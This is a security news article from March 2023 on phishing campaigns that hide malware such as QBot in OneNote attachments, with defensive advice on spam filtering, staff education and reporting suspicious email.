March 21, 2023 By Doug Bonderud 4 min read

There are plenty of phish in the digital sea, and attackers are constantly looking for new bait that helps them bypass security perimeters and land in user inboxes.

Their newest hook? OneNote documents. First noticed in December 2022, this phishing framework has seen success in fooling multiple antivirus (AV) tools by using .one file extensions, and January 2023 saw an attack uptick as compromises continued.

While this novel notes approach will eventually be phased out as phishing defenses catch up, current conditions make it worthwhile to understand how this attack works, what it means for organizations and what they can do to stay safe.

From many to .One — the impact of macro-economics

In July 2022, Microsoft disabled macros by default in all Office document types. Despite a temporary rollback in response to user concerns, auto-blocking of macros is now standard operating practice. While users can enable them after the fact, malicious actors can no longer rely on macros to make their phishing efforts easier.

To combat this cybersecurity change, attackers went looking for a new approach and found it in OneNote documents. For cyber criminals, the benefits of OneNote are two-fold. The first is novelty: Businesses aren’t expecting attacks in .one files. Next is efficacy: As noted by ZDNET, multiple AV tools did not flag OneNote attachments as malicious, even when they contained malware payloads.

How OneNote malware works

The first OneNote attacks were discovered in December 2022 as attackers experimented with new phishing methods. As of February 2023, more than 60 attacks were confirmed on companies in the manufacturing, industrial and education sectors.

Common payloads attached to malicious documents include AsyncRAT, AgentTesla, Doubleback and Redline. Malicious actors also created a mix of specific and general compromise campaigns. In the case of industrial and manufacturing firms, attachments appeared to be documents containing details about machine parts or specifications. Educational institutions were on the receiving end of more widespread campaigns that included fictitious invoices or offers of Christmas bonuses.

Despite the new file format, OneNote phishing attacks play out much like their more familiar counterparts. Victims must open the email message, open the attachment and then click through on malicious links. While OneNote does warn users about the risk of suspicious document links, this doesn’t always have the intended effect. Consider that 45% of all alerts are false positives and that one-third of IOT security staff ignore alerts if their queue is already full. Given that even security professionals don’t always investigate potential problems because they’re too busy or perceived threats may simply be common errors, it’s hardly surprising that front-line staff feel confident clicking through to OneNote documents despite system warnings.

Once inside a company’s network, malicious payloads delivered by OneNote documents can find, collect and exfiltrate sensitive data, including usernames, passwords and protected files.

Duck, duck, lose

Efforts are also underway to expand the impact of OneNote attacks by bundling documents with the QBot malware payload. Originally a banking trojan discovered in 2007, QBot — also called QakBot — has evolved into an initial access framework. As part of a phishing campaign, it takes on the task of gaining initial device access, in turn enabling attackers to load and execute additional malware payloads.

As noted by SC Magazine, a cyber crime group known as TA577 has leveraged QBot-based attacks to gain system access, then steal and sell collected data to other cyber criminals. Known as QakNote, this new attack approach has quickly gained ground. Since early February, attackers have pressed their advantage to hook as many phish as possible before the pond dries up.

In practice, QBot attacks start with an embedded HTML application (HTA) that retrieves QBot when users click on malicious links. Then, an HTA script uses the curl.exe application to download a DLL file that contains QBot. This file is placed in the C:\ProgramData folder and executed using Rundll32.exe. Finally, the payload injects itself into the Windows Assistive Technology file — AtBroker.exe — to conceal itself from security tools.

Foiling the phish

Recognizing OneNote issues is the first step in reducing risk. But what else can companies do to limit the chance of compromise?

Thankfully, the novel nature of the note attack doesn’t change the overall security strategy. First, companies need to implement robust spam filters to keep the bulk of potentially problematic emails out of user inboxes. This approach works well because it doesn’t just emphasize detecting the malicious nature of OneNote documents. Rather, it focuses on identifying messages as spam, which is often a more straightforward task.

Next is cybersecurity education which focuses on secure computing habits. While this includes reminders to heed security warnings, it’s also critical for companies to offer more proactive advice that helps staff spot phishing efforts more easily. As social engineering efforts become more in-depth, this education is shifting away from more generic recommendations such as seeking out grammar or spelling errors. Instead, it takes a more considered approach that focuses on questions. Common questions for staff include: Why am I receiving this email? Do I know the sender? Was I asking for these documents? What action are they asking me to take? It’s also worth running regular phishing exercises to see if staff can spot security risks before they click through.

Slow and steady

Lastly, enterprises need to prioritize the value of slowing down when it comes to improving security. This is because company culture often prioritizes speed. Staff want to meet deadlines and avoid setbacks on current projects, meaning that potential security threats may be sidelined in favor of keeping tasks on track. To address this, IT teams need to seek out C-suite support for policies that require staff to report potential problems and make it clear that this reporting takes priority over other tasks. It’s also worth implementing a system that allows staff to quickly flag emails for IT review.

Bottom line? Security teams need to take note and take action. The shift away from macro-based malware may have closed one digital door, but it opened a window for new phishing frameworks.

More from Risk Management

What does resilience in the cyber world look like in 2025 and beyond?

6 min read -  Back in 2021, we ran a series called “A Journey in Organizational Resilience.” These issues of this series remain applicable today and, in many cases, are more important than ever, given the rapid changes of the last few years. But the term "resilience" can be difficult to define, and when we define it, we may limit its scope, missing the big picture.In the age of generative artificial intelligence (gen AI), the prevalence of breach data from infostealers and the near-constant…

Airplane cybersecurity: Past, present, future

4 min read - With most aviation processes now digitized, airlines and the aviation industry as a whole must prioritize cybersecurity. If a cyber criminal launches an attack that affects a system involved in aviation — either an airline’s system or a third-party vendor — the entire process, from safety to passenger comfort, may be impacted.To improve security in the aviation industry, the FAA recently proposed new rules to tighten cybersecurity on airplanes. These rules would “protect the equipment, systems and networks of transport…

Protecting your digital assets from non-human identity attacks

4 min read - Untethered data accessibility and workflow automation are now foundational elements of most digital infrastructures. With the right applications and protocols in place, businesses no longer need to feel restricted by their lack of manpower or technical capabilities — machines are now filling those gaps.The use of non-human identities (NHIs) to power business-critical applications — especially those used in cloud computing environments or when facilitating service-to-service connections — has opened the doors for seamless operational efficiency. Unfortunately, these doors aren’t the…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today